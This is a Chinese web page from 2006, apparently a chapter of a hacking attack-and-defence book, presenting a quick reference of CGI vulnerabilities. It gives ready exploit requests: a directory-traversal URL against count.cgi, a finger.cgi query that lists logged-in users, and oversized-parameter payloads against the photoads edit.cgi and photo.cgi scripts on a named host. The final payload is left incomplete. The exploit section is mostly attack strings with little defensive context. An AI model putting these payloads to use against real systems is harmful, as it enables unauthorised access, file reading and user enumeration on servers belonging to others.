文章标题

黑客攻防技术内幕-安全防入侵与防病毒基础(11)

『更新时间：2006-10-13 』『字体：变小变大』『作者：佚名 | 来源：不详』

3.5 cgi及系统漏洞速查(2)

用count.cgi看图片：

http://server/cgi-bin/count.cgi?display=image&image=../../../../../../path_to_gif/file.gif

● finger.cgi

lynx http://www.server/cgi-bin/finger?@localhost

得到主机上登录的用户名。

● jfs

漏洞介绍：利用photoads这个cgi模块攻入主机，可以入侵pcweek-linux 主机，具体如下：

lynx "http://securelinux.hackpcweek.com/photoads/cgi-bin/edit.cgi?adnum=31337&action=done&country=lala&city=lele&state=a&email=lala@hjere.com&name= 11111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111&phone=11&subject=la&password=

0&citystphone=0&renewed=0"

创建新ad值绕过 $adnum 的检查后用：

lynx 'http://securelinux.hackpcweek.com/photoads/cgi-bin/photo.cgi?file=a.jpg&adnum=11111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111&datafile=

1&password=0&file_content=

【点击数：】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

文章标题

黑客攻防技术内幕-安全防入侵与防病毒基础(11)

相关文章

网友评论